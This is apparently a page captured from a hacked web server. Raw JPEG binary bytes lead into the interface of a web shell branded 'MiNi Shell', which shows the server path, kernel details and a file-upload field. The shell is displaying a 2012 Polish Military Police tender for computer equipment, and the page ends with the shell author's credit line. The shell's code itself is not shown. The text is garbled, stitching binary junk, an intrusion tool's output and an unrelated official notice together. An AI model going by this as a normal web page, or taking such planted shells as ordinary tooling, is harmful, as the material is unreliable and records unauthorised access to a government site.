JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/253191-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA SPRZĘTU INFORMATYKI I OPROGRAMOWANIA</b><br>
<b>Numer ogłoszenia: 253191 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oddział Zabezpieczenia Żandarmerii Wojskowej , ul. Jana Ostroroga 35, 01-163 Warszawa, woj. mazowieckie, tel. 22 685 32 47, faks 22 685 30 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU INFORMATYKI I OPROGRAMOWANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1
1.E-book reader	szt	5
2.Tablet	kpl.	20
3.Etui i stacja dokująca	kpl.	10
4.Monitor LCD 19 cali	kpl.	30
5.Monitor LCD 27 cali	kpl.	37

Zadanie nr 2
1.Telefax	szt	20 oraz  Materiały eksploatacyjne	kpl.	20
2.Drukarka mobilna	szt	10 oraz 	Materiały eksploatacyjne	kpl.	20
3.Drukarka laserowa A4 - mono	szt	80 oraz  Materiały eksploatacyjne	kpl.	80

Zadanie nr 3
1.Adapter do dysków	szt	30
2.Kabel przejściówka SATA na ATA	szt	5
3.Dysk wewnętrzny 500 GB	szt	4
4.Dysk zewnętrzny	szt	20
5.Pamięć RAM do laptopa 	szt	10
6.Kabel przedłużka	szt	10
7.Karta graficzna do PC	szt	3
8.Switch 8 portowy	szt	30
9.Switch 24 portowy	szt	12
10.Patchcord światłowodowy	szt	50
11.Kabel D-SUB 	szt	15
12.Kabel typu skrętka kat. 6 ekranowany (305m)	szt	2
13.Osłona wtyku RJ 45 (czerwona, zielona, niebieska)	szt	300
14.Końcówki RJ 45	szt	300

Zadanie nr 4
1.Karta diagnostyczna BIOS PCI/ISA/LPT+USB	szt	1
2.Adapter USB-IDE 3,5 cali, 2,5 cali, SATA, ATA dysk	szt	1
3.Zasilacz UPS	szt	7
4.Router	szt	1
5.Uchwyt do monitorów	szt	4
6.Tester kabli sieciowych	szt	2
7.Przetwornica napięciowa	szt	20
8.Drukarka kart chipowych	szt	1
9.Dysk twardy wewnętrzny 500GB	szt	2
10.Pamięć przenośna 2GB	szt	15
11.Pamięć przenośna 4GB	szt	15
12.Modem USB	szt	50
13.Klawiatura	szt	2
14.Kensington LOCK	szt	15
15.Wkrętak akumulatorowy	szt	2
16.Zaciskarka 8P/6P/4P	szt	4
17.Zestaw wkrętaków precyzyjnych	szt	5
18.Zasilacz ATX	szt	2
19.Kieszeń na dyski ATA/SATA	szt	3
20.Listwy zasilające	szt	22
21.Pamięć do laptopa	szt	2
22.Multimetr	szt	1
23.Lutownica  	szt	1oraz 	materiały eksploatacyjne do lutownicy	kpl	2
24.Nóż krosowniczy	szt	2

Zadanie nr 5
1.Kabel UTP kat.6 (305m.)	szt	3
2.Kabel VGA (D-SUB 15) (20m.)	szt	1
3.Kabel HDMI (20m.)	szt	1
4.Kabel typu skrętka kat. 6 ekranowany (305m)	szt	1
5.Pasta termoprzewodząca	szt	10
6.Płyta DVD-R 1,4 GB	szt	800
7.Płyta DVD-RW 1,4 GB	szt	200
8.Płyta DVD-R 4,7 GB	szt	400
9.Płyta DVD-RW 4,7 GB	szt	400
10.Sprężone powietrze	szt	40
11.Środek do czyszczenia LCD	szt	20
12.Środek do czyszczenia plastików	szt	20
13.Płyn kontakt	szt	5
14.Materiały eksploatacyjne do drukarki etykiet	kpl.	1
15.Śruby do szafy RACK	op/100	4
16.Osłona wtyku RJ 45 (czerwona, zielona, niebieska)	szt	900
17.Końcówki RJ 11	szt	200
18.Końcówki RJ 9	szt	200
19.Przedłużacz USB (2 m.)	szt	30
20.Patchcord światłowodowy SC/S.C. (1m.)	szt	10
21.Końcówki RJ 45	szt	1 000

Zadanie nr 6
1.Fax	szt	4 oraz	Komplet materiałów eksploatacyjnych	kpl.	4
2.Drukarka do zdjęć	szt	2 oraz 	Komplet materiałów eksploatacyjnych	kpl	6
3.Switch 8 portów	szt	10
4.Switch 24 porty	szt	1
5.Oprogramowanie Microsoft Office	szt	6
6.Oprogramowanie do obróbki zdjęć/grafiki	szt	2
7.Skaner rolkowy	szt	3
8.Skaner płaski	szt	1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.20.00-4, 30.23.40.00-8, 30.23.60.00-2, 30.23.70.00-9, 32.42.00.00-3, 48.70.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga zabezpieczenia oferty wadium.
2.Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości 13.300,00 zł (słownie: trzynaście tysięcy trzysta złotych) na całość zamówienia,
 w tym: 
dla zadania nr 1	6.000,00 zł	
dla zadania nr 2	5.000,00 zł	
dla zadania nr 3	1.000,00 zł	
dla zadania nr 4	600,00 zł	
dla zadania nr 5	nie wymagane	
dla zadania nr 6	700,00 zł	
3.Wadium może być wniesione w:
3.1.pieniądzu,
3.2. poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3. gwarancjach bankowych,
3.4.	gwarancjach ubezpieczeniowych,
3.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
4.Wadium w formie pieniądza należy wnieść przelewem na konto w Banku NBP O/O Warszawa, nr rachunku 98 1010 1010 0135 5013 9120 0000 z dopiskiem na przelewie: Wadium RZP/57/PN/S/2012. O terminie wniesienia wadium, decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.
5.Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
5.1.pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
5.2.innej niż pieniądz, oryginał dokumentu został złożony w Oddziale Zabezpieczenia Żandarmerii Wojskowej, Pion Głównego Księgowego, ul. Ostroroga 35, budynek  nr 1, pokój nr 244, przed terminem składania ofert.
6.Z treści gwarancji, poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy PZP.
7.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia 
na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy załączyć niżej wymienione dokumenty, odpowiednio do artykułów według Opisu przedmiotu zamówienia (zał. Nr 1 do SIWZ):
2.4.1. Oświadczenie o spełnieniu minimalnych wymaganych parametrów specyfikacji sprzętu.
2.4.2. Certyfikat ISO 14001 dla producenta sprzętu dla komputerów przenośnych.
2.4.3. Potwierdzenie spełnienia kryteriów środowiskowych dla oferowanych komputerów
2.4.4. Oświadczenie (lub wydruk) o spełnieniu wymogów normy Energy Star 5.0. dla oferowanych komputerów i drukarek
2.4.5. Karta gwarancyjna dla każdego egzemplarza sprzętu
2.4.6. Certyfikat ISO 9001: 2008 oraz autoryzację producenta drukarek na świadczenie usług serwisowych dla firmy serwisującej
2.4.7. Oświadczenie producenta sprzętu lub jego autoryzowanego przedstawiciela 
w Polsce, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem drukarek.
2.4.8. Certyfikat ISO 9001:2008 producenta oferowanych drukarek
2.4.9. Certyfikat ISO 140001:2004 producenta oferowanych drukarek
2.4.10. Karta katalogowa oferowanego zasilacza awaryjnego UPS</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy w zakresie:
1.terminu zawarcia umowy;
2.zmiany miejsca świadczenia;
3.z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
4.z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze Stron. 
Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział Zabezpieczenia Żandarmerii Wojskowej
01-163 Warszawa, ul. Ostroroga 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2012 godzina 09:30, miejsce: Oddział Zabezpieczenia Żandarmerii Wojskowej
ul. Ostroroga 35, 01-163 Warszawa
kancelaria jawna Zamawiającego - budynek nr 18, pokój nr 126.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Urządzenia komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Predmiotem zamówieniajest dostawa urządzeń komputerowych o zakresie: Zadanie nr 1
1.E-book reader	szt	5
2.Tablet	kpl.	20
3.Etui i stacja dokująca	kpl.	10
4.Monitor LCD 19 cali	kpl.	30
5.Monitor LCD 27 cali	kpl.	37.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Telefaksy i drukarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest dostawa:
Zadanie nr 2
1.Telefax	szt	20 oraz  Materiały eksploatacyjne	kpl.	20
2.Drukarka mobilna	szt	10 oraz 	Materiały eksploatacyjne	kpl.	20
3.Drukarka laserowa A4 - mono	szt	80 oraz  Materiały eksploatacyjne	kpl.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Różny sprzęt komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa
Zadanie nr 3
1.Adapter do dysków	szt	30
2.Kabel przejściówka SATA na ATA	szt	5
3.Dysk wewnętrzny 500 GB	szt	4
4.Dysk zewnętrzny	szt	20
5.Pamięć RAM do laptopa 	szt	10
6.Kabel przedłużka	szt	10
7.Karta graficzna do PC	szt	3
8.Switch 8 portowy	szt	30
9.Switch 24 portowy	szt	12
10.Patchcord światłowodowy	szt	50
11.Kabel D-SUB 	szt	15
12.Kabel typu skrętka kat. 6 ekranowany (305m)	szt	2
13.Osłona wtyku RJ 45 (czerwona, zielona, niebieska)	szt	300
14.Końcówki RJ 45	szt	300
mówienia jest dostawa różnego sprzętu komputerowego o zakresie:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - sprzęt peryferyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest dostawa sprzętu peryferyjnego o zakresie:
Zadanie nr 4
1.Karta diagnostyczna BIOS PCI/ISA/LPT+USB	szt	1
2.Adapter USB-IDE 3,5 cali, 2,5 cali, SATA, ATA dysk	szt	1
3.Zasilacz UPS	szt	7
4.Router	szt	1
5.Uchwyt do monitorów	szt	4
6.Tester kabli sieciowych	szt	2
7.Przetwornica napięciowa	szt	20
8.Drukarka kart chipowych	szt	1
9.Dysk twardy wewnętrzny 500GB	szt	2
10.Pamięć przenośna 2GB	szt	15
11.Pamięć przenośna 4GB	szt	15
12.Modem USB	szt	50
13.Klawiatura	szt	2
14.Kensington LOCK	szt	15
15.Wkrętak akumulatorowy	szt	2
16.Zaciskarka 8P/6P/4P	szt	4
17.Zestaw wkrętaków precyzyjnych	szt	5
18.Zasilacz ATX	szt	2
19.Kieszeń na dyski ATA/SATA	szt	3
20.Listwy zasilające	szt	22
21.Pamięć do laptopa	szt	2
22.Multimetr	szt	1
23.Lutownica  	szt	1oraz 	materiały eksploatacyjne do lutownicy	kpl	2
24.Nóż krosowniczy	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - Różny sprzęt komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest dostawa różnego sprzętu komputerowego o zakresie:
Zadanie nr 5
1.Kabel UTP kat.6 (305m.)	szt	3
2.Kabel VGA (D-SUB 15) (20m.)	szt	1
3.Kabel HDMI (20m.)	szt	1
4.Kabel typu skrętka kat. 6 ekranowany (305m)	szt	1
5.Pasta termoprzewodząca	szt	10
6.Płyta DVD-R 1,4 GB	szt	800
7.Płyta DVD-RW 1,4 GB	szt	200
8.Płyta DVD-R 4,7 GB	szt	400
9.Płyta DVD-RW 4,7 GB	szt	400
10.Sprężone powietrze	szt	40
11.Środek do czyszczenia LCD	szt	20
12.Środek do czyszczenia plastików	szt	20
13.Płyn kontakt	szt	5
14.Materiały eksploatacyjne do drukarki etykiet	kpl.	1
15.Śruby do szafy RACK	op/100	4
16.Osłona wtyku RJ 45 (czerwona, zielona, niebieska)	szt	900
17.Końcówki RJ 11	szt	200
18.Końcówki RJ 9	szt	200
19.Przedłużacz USB (2 m.)	szt	30
20.Patchcord światłowodowy SC/S.C. (1m.)	szt	10
21.Końcówki RJ 45	szt	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - Pakiety oprogramowania i urządzenia do przesyłania danych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa pakietów oprogramowania i urządzeń do przesyłania danych o zakresie:
Zadanie nr 6
1.Fax	szt	4 oraz	Komplet materiałów eksploatacyjnych	kpl.	4
2.Drukarka do zdjęć	szt	2 oraz 	Komplet materiałów eksploatacyjnych	kpl	6
3.Switch 8 portów	szt	10
4.Switch 24 porty	szt	1
5.Oprogramowanie Microsoft Office	szt	6
6.Oprogramowanie do obróbki zdjęć/grafiki	szt	2
7.Skaner rolkowy	szt	3
8.Skaner płaski	szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5, 32.26.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com